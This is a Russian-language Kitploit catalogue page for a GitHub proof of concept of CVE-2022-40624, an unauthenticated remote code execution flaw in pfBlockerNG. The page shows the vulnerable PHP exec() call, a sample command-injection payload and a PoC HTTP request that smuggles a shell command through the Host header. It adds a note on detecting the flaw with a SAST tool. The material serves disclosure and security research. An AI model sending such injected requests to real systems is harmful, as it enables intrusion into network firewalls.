Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
pfBlockerNg-CVE-2022-40624 — Эксплойт Proof-of-concept для неаутентифицированного удаленного выполнения кода в pfBlockerNg через несанитизированный ввод в функции запроса DNSBL TLD, с анализом обнаружения SAST. | Kitploit
Инструменты/GitHubGitHub/dhammon/pfblockerng-cve-2022-40624
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubdhammon/pfblockerng-cve-2022-40624

pfBlockerNg-CVE-2022-40624

Эксплойт Proof-of-concept для неаутентифицированного удаленного выполнения кода в pfBlockerNg через несанитизированный ввод в функции запроса DNSBL TLD, с анализом обнаружения SAST.

Репозиторий
223 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

pfBlockerNg-CVE-2022-40624

Предыстория

pfBlockerNG — это следующее поколение pfBlocker со следующими возможностями:

  1. Управление источниками списков IPv4/v6 в форматы 'Deny, Permit или Match'.
  2. База данных GeoIP от MaxMind Inc. (бесплатная версия GeoLite2).
  3. Дедупликация, подавление и улучшения репутации.
  4. Возможность загрузки из различных форматов списков.
  5. Расширенная интеграция с источниками угроз репутации IP Proofpoint ET IQRisk.
  6. Блокировка доменных имен (DNSBL) через DNS-резолвер Unbound.

https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html

Затронутые версии

pfBlockerNg <2.1.4_27

Уязвимость

Неаутентифицированное удаленное выполнение кода (RCE)

Запрос для раздела TLD Block в index.php включает несанитизированный/неэкранированный пользовательский ввод d_query из заголовка Host в функцию PHP exec.

exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

/pfblockerng/www/index.php

root@kitploit:~
// Query for a TLD Block
if (empty($pfb_query)) {
	$idparts	= explode('.', $query);
	$idcnt		= (count($idparts) -1);

	for ($i=1; $i <= $idcnt; $i++) {
		$d_query = implode('.', array_slice($idparts, -$i, $i, TRUE));
		exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

		if (!empty($match[0])) {
			$pfb_query = 'DNSBL_TLD';
			break;
		}
	}
}

Эксплуатация

Требуется HTTP-доступ к веб-консоли pfSense Пример полезной нагрузки: ' *; sleep 5; '

POC запрос:

root@kitploit:~
GET /pfblockerng/www/index.php HTTP/1.1
Host: test.test2' *; sleep 5; '
Content-Length: 2

Вдохновение

Я люблю pfBlockerNg и был вдохновлен недавним CVE-2022-31814 от Di r00t и отличным отчетом https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ и мне стало интересно, сможет ли инструмент статического тестирования безопасности приложений (SAST) Snyk обнаружить уязвимость. Поэтому я скачал соответствующий файл index.php версии 2.1.4_26 и запустил против него Snyk Code. Действительно, Snyk обнаружил уязвимость, а также еще одну аналогичную, всего несколько строк спустя.

Скачать инструмент